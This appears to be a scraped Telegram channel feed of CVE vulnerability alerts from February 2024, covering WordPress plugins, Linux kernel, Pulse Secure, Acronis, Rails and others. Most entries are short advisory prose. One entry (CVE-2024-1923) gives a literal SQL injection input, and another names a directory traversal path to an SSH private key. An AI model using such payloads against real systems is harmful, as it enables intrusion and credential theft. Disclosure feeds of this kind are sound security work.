🚨 CVE-2024-25723ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2.🎖@cveNotify |
|
| 2024-02-28 14:07:48 |
🚨 CVE-2024-1921A vulnerability, which was classified as critical, was found in osuuu LightPicture up to 1.2.2. Affected is an unknown function of the file /app/controller/Setup.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254856.🎖@cveNotify |
|
| 2024-02-28 12:37:29 |
🚨 CVE-2024-26016A low privilege authenticated user could import an existing dashboard or chart that they do not have access to and then modify its metadata, thereby gaining ownership of the object. However, it's important to note that access to the analytical data of these charts and dashboards would still be subject to validation based on data access privileges.This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1.Users are recommended to upgrade to version 3.1.1, which fixes the issue.🎖@cveNotify |
|
| 2024-02-28 12:37:26 |
🚨 CVE-2024-24779Apache Superset with custom roles that include `can write on dataset` and without all data access permissions, allows for users to create virtual datasets to data they don't have access to. These users could then use those virtual datasets to get access to unauthorized data.This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1.Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue.🎖@cveNotify |
|
| 2024-02-28 12:37:25 |
🚨 CVE-2024-1636Potential Cross-Site Scripting (XSS) in the page editing area.🎖@cveNotify |
|
| 2024-02-28 12:37:24 |
🚨 CVE-2024-1632Low-privileged users with access to the Sitefinity backend may obtain sensitive information from the site's administrative area.🎖@cveNotify |
|
| 2024-02-28 10:37:32 |
🚨 CVE-2024-1860The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the antihacker_add_whitelist() function in all versions up to, and including, 4.51. This makes it possible for unauthenticated attackers to add their IP Address to the whitelist circumventing protection🎖@cveNotify |
|
| 2024-02-28 10:37:31 |
🚨 CVE-2024-1719The Easy PayPal & Stripe Buy Now Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.3 and in Contact Form 7 – PayPal & Stripe Add-on all versions up to, and including 2.1. This is due to missing or incorrect nonce validation on the 'wpecpp_stripe_connect_completion' function. This makes it possible for unauthenticated attackers to modify the plugins settings and chance the stripe connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-02-28 09:38:04 |
🚨 CVE-2020-36783In the Linux kernel, the following vulnerability has been resolved:i2c: img-scb: fix reference leak when pm_runtime_get_sync failsThe PM reference count is not expected to be incremented onreturn in functions img_i2c_xfer and img_i2c_init.However, pm_runtime_get_sync will increment the PM referencecount even failed. Forgetting to putting operation will resultin a reference leak here.Replace it with pm_runtime_resume_and_get to keep usagecounter balanced.🎖@cveNotify |
|
| 2024-02-28 09:37:58 |
🚨 CVE-2020-36782In the Linux kernel, the following vulnerability has been resolved:i2c: imx-lpi2c: fix reference leak when pm_runtime_get_sync failsThe PM reference count is not expected to be incremented onreturn in lpi2c_imx_master_enable.However, pm_runtime_get_sync will increment the PM referencecount even failed. Forgetting to putting operation will resultin a reference leak here.Replace it with pm_runtime_resume_and_get to keep usagecounter balanced.🎖@cveNotify |
|
| 2024-02-28 09:37:57 |
🚨 CVE-2020-36779In the Linux kernel, the following vulnerability has been resolved:i2c: stm32f7: fix reference leak when pm_runtime_get_sync failsThe PM reference count is not expected to be incremented onreturn in these stm32f7_i2c_xx serious functions.However, pm_runtime_get_sync will increment the PM referencecount even failed. Forgetting to putting operation will resultin a reference leak here.Replace it with pm_runtime_resume_and_get to keep usagecounter balanced.🎖@cveNotify |
|
| 2024-02-28 09:37:56 |
🚨 CVE-2020-36778In the Linux kernel, the following vulnerability has been resolved:i2c: xiic: fix reference leak when pm_runtime_get_sync failsThe PM reference count is not expected to be incremented onreturn in xiic_xfer and xiic_i2c_remove.However, pm_runtime_get_sync will increment the PM referencecount even failed. Forgetting to putting operation will resultin a reference leak here.Replace it with pm_runtime_resume_and_get to keep usagecounter balanced.🎖@cveNotify |
|
| 2024-02-28 07:37:25 |
🚨 CVE-2024-1568The Seraphinite Accelerator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.20.52 via the OnAdminApi_HtmlCheck function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2024-02-28 07:37:24 |
🚨 CVE-2024-1388The Yuki theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reset_customizer_options() function in all versions up to, and including, 1.3.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to reset the theme's settings.🎖@cveNotify |
|
| 2024-02-28 06:37:24 |
🚨 CVE-2024-22723Webtrees 2.1.18 is vulnerable to Directory Traversal. By manipulating the "media_folder" parameter in the URL, an attacker (in this case, an administrator) can navigate beyond the intended directory (the 'media/' directory) to access sensitive files in other parts of the application's file system.🎖@cveNotify |
|
| 2024-02-28 05:37:24 |
🚨 CVE-2024-0550A user who is privileged already `manager` or `admin` can set their profile picture via the frontend API using a relative filepath to then user the PFP GET API to download any valid files.The attacker would have to have been granted privileged permissions to the system before executing this attack.🎖@cveNotify |
|
| 2024-02-28 03:37:53 |
🚨 CVE-2023-50737The SE menu contains information used by Lexmark to diagnose device errors. A vulnerability in one of the SE menu routines can be leveraged by an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-02-28 03:37:48 |
🚨 CVE-2023-50735A heap corruption vulnerability has been identified in PostScript interpreter in various Lexmark devices. The vulnerability can be leveraged by an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-02-28 03:37:47 |
🚨 CVE-2024-26603In the Linux kernel, the following vulnerability has been resolved:x86/fpu: Stop relying on userspace for info to fault in xsave bufferBefore this change, the expected size of the user space buffer wastaken from fx_sw->xstate_size. fx_sw->xstate_size can be changedfrom user-space, so it is possible construct a sigreturn frame where: * fx_sw->xstate_size is smaller than the size required by valid bits in fx_sw->xfeatures. * user-space unmaps parts of the sigrame fpu buffer so that not all of the buffer required by xrstor is accessible.In this case, xrstor tries to restore and accesses the unmapped areawhich results in a fault. But fault_in_readable succeeds because buf +fx_sw->xstate_size is within the still mapped area, so it goes back andtries xrstor again. It will spin in this loop forever.Instead, fault in the maximum size which can be touched by XRSTOR (takenfrom fpstate->user_size).[ dhansen: tweak subject / changelog ]🎖@cveNotify |
|
| 2024-02-28 03:37:43 |
🚨 CVE-2024-26585In the Linux kernel, the following vulnerability has been resolved:tls: fix race between tx work scheduling and socket closeSimilarly to previous commit, the submitting thread (recvmsg/sendmsg)may exit as soon as the async crypto handler calls complete().Reorder scheduling the work before calling complete().This seems more logical in the first place, as it'sthe inverse order of what the submitting thread will do.🎖@cveNotify |
|
| 2024-02-28 03:37:42 |
🚨 CVE-2024-26583In the Linux kernel, the following vulnerability has been resolved:tls: fix race between async notify and socket closeThe submitting thread (one which called recvmsg/sendmsg)may exit as soon as the async crypto handler calls complete()so any code past that point risks touching already freed data.Try to avoid the locking and extra flags altogether.Have the main thread hold an extra reference, this waywe can depend solely on the atomic ref counter forsynchronization.Don't futz with reiniting the completion, either, we are nowtightly controlling when completion fires.🎖@cveNotify |
|
| 2024-02-28 03:37:41 |
🚨 CVE-2024-26582In the Linux kernel, the following vulnerability has been resolved:net: tls: fix use-after-free with partial reads and async decrypttls_decrypt_sg doesn't take a reference on the pages from clear_skb,so the put_page() in tls_decrypt_done releases them, and we triggera use-after-free in process_rx_list when we try to read from thepartially-read skb.🎖@cveNotify |
|
| 2024-02-28 03:37:38 |
🚨 CVE-2024-23851copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl.🎖@cveNotify |
|
| 2024-02-28 03:37:37 |
🚨 CVE-2023-46234browserify-sign is a package to duplicate the functionality of node's crypto public key functions, much of this is based on Fedor Indutny's work on indutny/tls.js. An upper bound check issue in `dsaVerify` function allows an attacker to construct signatures that can be successfully verified by any public key, thus leading to a signature forgery attack. All places in this project that involve DSA verification of user-input signatures will be affected by this vulnerability. This issue has been patched in version 4.2.2.🎖@cveNotify |
|
| 2024-02-28 03:37:36 |
🚨 CVE-2022-37599A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js.🎖@cveNotify |
|
| 2024-02-28 02:37:25 |
🚨 CVE-2024-1597pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected.🎖@cveNotify |
|
| 2024-02-28 01:37:24 |
🚨 CVE-2023-7033Insufficient Resource Pool vulnerability in Ethernet function of Mitsubishi Electric Corporation MELSEC iQ-F Series CPU modules allows a remote attacker to cause a temporary Denial of Service condition for a certain period of time in Ethernet communication of the products by performing TCP SYN Flood attack.🎖@cveNotify |
|
| 2024-02-28 00:37:25 |
🚨 CVE-2024-1932Unrestricted Upload of File with Dangerous Type in freescout-helpdesk/freescout🎖@cveNotify |
|
| 2024-02-28 00:37:24 |
🚨 CVE-2024-1892Parts of the Scrapy API were found to be vulnerable to a ReDoS attack. Handling a malicious response could cause extreme CPU and memory usage during the parsing of its content, due to the use of vulnerable regular expressions for that parsing.🎖@cveNotify |
|
| 2024-02-27 23:37:30 |
🚨 CVE-2024-26301A vulnerability in the web-based management interface of ClearPass Policy Manager could allow a remote attacker authenticated with low privileges to access sensitive information. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager.🎖@cveNotify |
|
| 2024-02-27 23:37:29 |
🚨 CVE-2024-26300A vulnerability in the guest interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface.🎖@cveNotify |
|
| 2024-02-27 21:37:25 |
🚨 CVE-2023-42753An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h->nets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-02-27 21:37:24 |
🚨 CVE-2019-11213In Pulse Secure Pulse Desktop Client and Network Connect, an attacker could access session tokens to replay and spoof sessions, and as a result, gain unauthorized access as an end user, a related issue to CVE-2019-1573. (The endpoint would need to be already compromised for exploitation to succeed.) This affects Pulse Desktop Client 5.x before Secure Desktop 5.3R7 and Pulse Desktop Client 9.x before Secure Desktop 9.0R3. It also affects (for Network Connect customers) Pulse Connect Secure 8.1 before 8.1R14, 8.3 before 8.3R7, and 9.0 before 9.0R3.🎖@cveNotify |
|
| 2024-02-27 21:07:44 |
🚨 CVE-2019-11509In Pulse Secure Pulse Connect Secure (PCS) before 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 and Pulse Policy Secure (PPS) before 5.1R15.1, 5.2 before 5.2R12.1, 5.3 before 5.3R15.1, 5.4 before 5.4R7.1, and 9.0 before 9.0R3.2, an authenticated attacker (via the admin web interface) can exploit Incorrect Access Control to execute arbitrary code on the appliance.🎖@cveNotify |
|
| 2024-02-27 21:07:43 |
🚨 CVE-2019-11507In Pulse Secure Pulse Connect Secure (PCS) 8.3.x before 8.3R7.1 and 9.0.x before 9.0R3, an XSS issue has been found on the Application Launcher page.🎖@cveNotify |
|
| 2024-02-27 21:07:42 |
🚨 CVE-2019-11543XSS exists in the admin web console in Pulse Secure Pulse Connect Secure (PCS) 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, and 5.2RX before 5.2R12.1.🎖@cveNotify |
|
| 2024-02-27 21:07:39 |
🚨 CVE-2019-11542In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, an authenticated attacker (via the admin web interface) can send a specially crafted message resulting in a stack buffer overflow.🎖@cveNotify |
|
| 2024-02-27 21:07:38 |
🚨 CVE-2019-11541In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, and 8.2RX before 8.2R12.1, users using SAML authentication with the Reuse Existing NC (Pulse) Session option may see authentication leaks.🎖@cveNotify |
|
| 2024-02-27 21:07:37 |
🚨 CVE-2019-11538In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1, an NFS problem could allow an authenticated attacker to access the contents of arbitrary files on the affected device.🎖@cveNotify |
|
| 2024-02-27 21:07:32 |
🚨 CVE-2018-14366download.cgi in Pulse Secure Pulse Connect Secure 8.1RX before 8.1R13 and 8.3RX before 8.3R4 and Pulse Policy Secure through 5.2RX before 5.2R10 and 5.4RX before 5.4R4 have an Open Redirect Vulnerability.🎖@cveNotify |
|
| 2024-02-27 21:07:31 |
🚨 CVE-2016-4791The administrative user interface in Pulse Connect Secure (PCS) 8.2 before 8.2r1, 8.1 before 8.1r2, 8.0 before 8.0r9, and 7.4 before 7.4r13.4 allows remote administrators to enumerate files, read arbitrary files, and conduct server side request forgery (SSRF) attacks via unspecified vectors.🎖@cveNotify |
|
| 2024-02-27 21:07:26 |
🚨 CVE-2016-4789Cross-site scripting (XSS) vulnerability in the system configuration section in the administrative user interface in Pulse Connect Secure (PCS) 8.2 before 8.2r1, 8.1 before 8.1r2, 8.0 before 8.0r9, and 7.4 before 7.4r13.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2024-02-27 21:07:25 |
🚨 CVE-2016-4786Pulse Connect Secure (PCS) 8.2 before 8.2r1, 8.1 before 8.1r3, 8.0 before 8.0r11, and 7.4 before 7.4r13.4 allow remote attackers to cause a denial of service (CPU consumption) via unspecified vectors.🎖@cveNotify |
|
| 2024-02-27 20:09:24 |
CVE Notify pinned «🚨 For advertising in the channel, contact @SirMalware» |
|
| 2024-02-27 20:09:21 |
🚨 For advertising in the channel, contact @SirMalware |
|
| 2024-02-27 20:07:47 |
🚨 CVE-2024-21353Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-02-27 20:07:46 |
🚨 CVE-2024-21343Windows Network Address Translation (NAT) Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-02-27 19:37:25 |
🚨 CVE-2024-1140Twister Antivirus v8.17 is vulnerable to an Out-of-bounds Read vulnerability by triggering the 0x801120B8 IOCTL code of the filmfd.sys driver.🎖@cveNotify |
|
| 2024-02-27 19:37:24 |
🚨 CVE-2024-1096Twister Antivirus v8.17 allows Elevation of Privileges on the computer where it's installed by triggering the 0x80112067, 0x801120CB and 0x801120CC IOCTL codes of the fildds.sys driver.🎖@cveNotify |
|
| 2024-02-27 18:37:24 |
🚨 CVE-2024-24806libuv is a multi-platform support library with a focus on asynchronous I/O. The `uv_getaddrinfo` function in `src/unix/getaddrinfo.c` (and its windows counterpart `src/win/getaddrinfo.c`), truncates hostnames to 256 characters before calling `getaddrinfo`. This behavior can be exploited to create addresses like `0x00007f000001`, which are considered valid by `getaddrinfo` and could allow an attacker to craft payloads that resolve to unintended IP addresses, bypassing developer checks. The vulnerability arises due to how the `hostname_ascii` variable (with a length of 256 bytes) is handled in `uv_getaddrinfo` and subsequently in `uv__idna_toascii`. When the hostname exceeds 256 characters, it gets truncated without a terminating null byte. As a result attackers may be able to access internal APIs or for websites (similar to MySpace) that allows users to have `username.example.com` pages. Internal services that crawl or cache these user pages can be exposed to SSRF attacks if a malicious user chooses a long vulnerable username. This issue has been addressed in release version 1.48.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-27 18:07:31 |
🚨 CVE-2024-21304Trusted Compute Base Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-27 17:37:37 |
🚨 CVE-2023-48681Self cross-site scripting (XSS) vulnerability in storage nodes search field. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-27 17:37:36 |
🚨 CVE-2023-48680Sensitive information disclosure due to excessive collection of system information. The following products are affected: Acronis Cyber Protect 16 (macOS, Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-27 17:37:32 |
🚨 CVE-2023-48678Sensitive information disclosure due to insecure folder permissions. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-27 17:37:31 |
🚨 CVE-2024-22454Dell PowerProtect Data Manager, version 19.15 and prior versions, contain a weak password recovery mechanism for forgotten passwords. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to unauthorized access to the application with privileges of the compromised account. The attacker could retrieve the reset password token without authorization and then perform the password change🎖@cveNotify |
|
| 2024-02-27 17:37:30 |
🚨 CVE-2023-6779An off-by-one heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a message bigger than INT_MAX bytes, leading to an incorrect calculation of the buffer size to store the message, resulting in an application crash. This issue affects glibc 2.37 and newer.🎖@cveNotify |
|
| 2024-02-27 17:37:27 |
🚨 CVE-2023-45248Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 36497, Acronis Cyber Protect 16 (Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-27 17:37:26 |
🚨 CVE-2023-45241Sensitive information leak through log files. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 35739, Acronis Cyber Protect 16 (Linux, macOS, Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-27 17:37:25 |
🚨 CVE-2023-44213Sensitive information disclosure due to excessive collection of system information. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 35739, Acronis Cyber Protect 16 (Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-27 17:37:24 |
🚨 CVE-2023-44211Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 31637, Acronis Cyber Protect 16 (Linux, Windows) before build 37391.🎖@cveNotify |
|
| 2024-02-27 17:07:25 |
🚨 CVE-2024-22445Dell PowerProtect Data Manager, version 19.15 and prior versions, contain an OS command injection vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.🎖@cveNotify |
|
| 2024-02-27 17:07:24 |
🚨 CVE-2024-1459A path traversal vulnerability was found in Undertow. This issue may allow a remote attacker to append a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP, which may permit access to privileged or restricted files and directories.🎖@cveNotify |
|
| 2024-02-27 16:37:40 |
🚨 CVE-2024-26144Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain proxies may cache the Set-Cookie, leading to an information leak. The vulnerability is fixed in 7.0.8.1 and 6.1.7.7.🎖@cveNotify |
|
| 2024-02-27 16:37:39 |
🚨 CVE-2024-26143Rails is a web-application framework. There is a possible XSS vulnerability when using the translation helpers in Action Controller. Applications using translation methods like translate, or t on a controller, with a key ending in "_html", a :default key which contains untrusted user input, and the resulting string is used in a view, may be susceptible to an XSS vulnerability. The vulnerability is fixed in 7.1.3.1 and 7.0.8.1.🎖@cveNotify |
|
| 2024-02-27 16:37:35 |
🚨 CVE-2024-25399Subrion CMS 4.2.1 is vulnerable to Cross Site Scripting (XSS) via adminer.php.🎖@cveNotify |
|
| 2024-02-27 16:37:34 |
🚨 CVE-2024-1923A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as critical. Affected by this issue is the function delete_class of the file /ajax-api.php of the component List of Classes Page. The manipulation of the argument id with the input 1337'+or+1=1;--+ leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254858 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-27 16:37:29 |
🚨 CVE-2024-1403In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified. Thevulnerability is a bypass to authentication based on a failure to properlyhandle username and password. Certain unexpectedcontent passed into the credentials can lead to unauthorized access without properauthentication.🎖@cveNotify |
|
| 2024-02-27 16:37:28 |
🚨 CVE-2024-21484Versions of the package jsrsasign before 11.0.0 are vulnerable to Observable Discrepancy via the RSA PKCS1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting this vulnerability. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key. Workaround The vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library.🎖@cveNotify |
|
| 2024-02-27 16:07:49 |
🚨 CVE-2023-51767OpenSSH through 9.6, when common types of DRAM are used, might allow row hammer attacks (for authentication bypass) because the integer value of authenticated in mm_answer_authpassword does not resist flips of a single bit. NOTE: this is applicable to a certain threat model of attacker-victim co-location in which the attacker has user privileges.🎖@cveNotify |
|
| 2024-02-27 13:37:39 |
🚨 CVE-2024-0197A flaw in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows allows an attacker to escalate their privilege level via local access.🎖@cveNotify |
|
| 2024-02-27 11:37:40 |
🚨 CVE-2024-1653The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxUpdateFolderPosition in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the folder position of categories as well as update the metadata of other taxonomies.🎖@cveNotify |
|
| 2024-02-27 11:37:34 |
🚨 CVE-2024-1652The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxClearCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to clear categories.🎖@cveNotify |
|
| 2024-02-27 11:37:33 |
🚨 CVE-2023-7016A flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows allows an attacker to execute code at a SYSTEM level via local access.🎖@cveNotify |
|
| 2024-02-27 11:37:32 |
🚨 CVE-2023-5993A flaw in the Windows Installer in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows allows an attacker to escalate their privilege level via local access.🎖@cveNotify |
|
| 2024-02-27 09:38:25 |
🚨 CVE-2024-1106The Shariff Wrapper WordPress plugin before 4.6.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-02-27 09:38:24 |
🚨 CVE-2024-0855The Spiffy Calendar WordPress plugin before 4.9.9 doesn't check the event_author parameter, and allows any user to alter it when creating an event, leading to deceiving users/admins that a page was created by a Contributor+.🎖@cveNotify |
|
| 2024-02-27 09:38:21 |
🚨 CVE-2023-7203The Smart Forms WordPress plugin before 2.6.87 does not have authorisation in various AJAX actions, which could allow users with a role as low as subscriber to call them and perform unauthorised actions such as deleting entries. The plugin also lacks CSRF checks in some places which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as deleting entries.🎖@cveNotify |
|
| 2024-02-27 09:38:20 |
🚨 CVE-2023-7198The WP Dashboard Notes WordPress plugin before 1.0.11 is vulnerable to Insecure Direct Object References (IDOR) in post_id= parameter. Authenticated users are able to delete private notes associated with different user accounts. This poses a significant security risk as it violates the principle of least privilege and compromises the integrity and privacy of user data.🎖@cveNotify |
|
| 2024-02-27 09:38:19 |
🚨 CVE-2023-7165The JetBackup WordPress plugin before 2.0.9.9 doesn't use index files to prevent public directory listing of sensitive directories in certain configurations, which allows malicious actors to leak backup files.🎖@cveNotify |
|
| 2024-02-27 09:38:15 |
🚨 CVE-2023-6584The WP JobSearch WordPress plugin before 2.3.4 does not prevent attackers from logging-in as any users with the only knowledge of that user's email address.🎖@cveNotify |
|
| 2024-02-27 09:38:14 |
🚨 CVE-2023-50379Malicious code injection in Apache Ambari in prior to 2.7.8. Users are recommended to upgrade to version 2.7.8, which fixes this issue.Impact:A Cluster Operator can manipulate the request by adding a malicious code injection and gain a root over the cluster main host.🎖@cveNotify |
|
| 2024-02-27 07:37:26 |
🚨 CVE-2021-46909In the Linux kernel, the following vulnerability has been resolved:ARM: footbridge: fix PCI interrupt mappingSince commit 30fdfb929e82 ("PCI: Add a call to pci_assign_irq() inpci_device_probe()"), the PCI code will call the IRQ mapping functionwhenever a PCI driver is probed. If these are marked as __init, thiscauses an oops if a PCI driver is loaded or bound after the kernel hasinitialised.🎖@cveNotify |
|
| 2024-02-27 07:37:25 |
🚨 CVE-2024-26484A stored cross-site scripting (XSS) vulnerability in the Edit Content Layout module of Kirby CMS v4.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Link field. NOTE: the vendor's position is that this issue did not affect any version of Kirby CMS. The only effect was on the trykirby.com demo site, which is not customer-controlled.🎖@cveNotify |
|
| 2024-02-27 07:37:24 |
🚨 CVE-2023-4194A flaw was found in the Linux kernel's TUN/TAP functionality. This issue could allow a local user to bypass network filters and gain unauthorized access to some resources. The original patches fixing CVE-2023-1076 are incorrect or incomplete. The problem is that the following upstream commits - a096ccca6e50 ("tun: tun_chr_open(): correctly initialize socket uid"), - 66b2c338adce ("tap: tap_open(): correctly initialize socket uid"), pass "inode->i_uid" to sock_init_data_uid() as the last parameter and that turns out to not be accurate.🎖@cveNotify |
|
| 2024-02-27 06:37:27 |
🚨 CVE-2024-1687The Thank You Page Customizer for WooCommerce – Increase Your Sales plugin for WordPress is vulnerable to unauthorized execution of shortcodes due to a missing capability check on the get_text_editor_content() function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.🎖@cveNotify |
|
| 2024-02-27 06:37:26 |
🚨 CVE-2024-0759Should an instance of AnythingLLM be hosted on an internal network and the attacked be explicitly granted a permission level of manager or admin, they could link-scrape internally resolving IPs of other services that are on the same network as AnythingLLM.This would require the attacker also be able to guess these internal IPs as `/*` ranging is not possible, but could be brute forced.There is a duty of care that other services on the same network would not be fully open and accessible via a simple CuRL with zero authentication as it is not possible to set headers or access via the link collector.🎖@cveNotify |
|
| 2024-02-27 05:37:24 |
🚨 CVE-2024-1323The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Post Type Grid Widget Title in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-27 04:37:25 |
🚨 CVE-2024-22368The Spreadsheet::ParseXLSX package before 0.28 for Perl can encounter an out-of-memory condition during parsing of a crafted XLSX document. This occurs because the memoize implementation does not have appropriate constraints on merged cells.🎖@cveNotify |
|
| 2024-02-27 04:37:24 |
🚨 CVE-2023-32307Sofia-SIP is an open-source SIP User-Agent library, compliant with the IETF RFC3261 specification.Referring to [GHSA-8599-x7rq-fr54](https://github.com/freeswitch/sofia-sip/security/advisories/GHSA-8599-x7rq-fr54), several other potential heap-over-flow and integer-overflow in stun_parse_attr_error_code and stun_parse_attr_uint32 were found because the lack of attributes length check when Sofia-SIP handles STUN packets. The previous patch of [GHSA-8599-x7rq-fr54](https://github.com/freeswitch/sofia-sip/security/advisories/GHSA-8599-x7rq-fr54) fixed the vulnerability when attr_type did not match the enum value, but there are also vulnerabilities in the handling of other valid cases. The OOB read and integer-overflow made by attacker may lead to crash, high consumption of memory or even other more serious consequences. These issue have been addressed in version 1.13.15. Users are advised to upgrade.🎖@cveNotify |
|
| 2024-02-27 02:37:45 |
🚨 CVE-2024-25711diffoscope before 256 allows directory traversal via an embedded filename in a GPG file. Contents of any file, such as ../.ssh/id_rsa, may be disclosed to an attacker. This occurs because the value of the gpg --use-embedded-filenames option is trusted.🎖@cveNotify |
|
| 2024-02-27 02:37:41 |
🚨 CVE-2024-24099Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection under Employment Status Information Update.🎖@cveNotify |
|
| 2024-02-27 02:37:40 |
🚨 CVE-2024-22917SQL injection vulnerability in Dynamic Lab Management System Project in PHP v.1.0 allows a remote attacker to execute arbitrary code via a crafted script.🎖@cveNotify |
|
| 2024-02-27 02:37:35 |
🚨 CVE-2024-22543An issue was discovered in Linksys Router E1700 1.0.04 (build 3), allows authenticated attackers to escalate privileges via a crafted GET request to the /goform/* URI or via the ExportSettings function.🎖@cveNotify |
|
| 2024-02-27 02:37:34 |
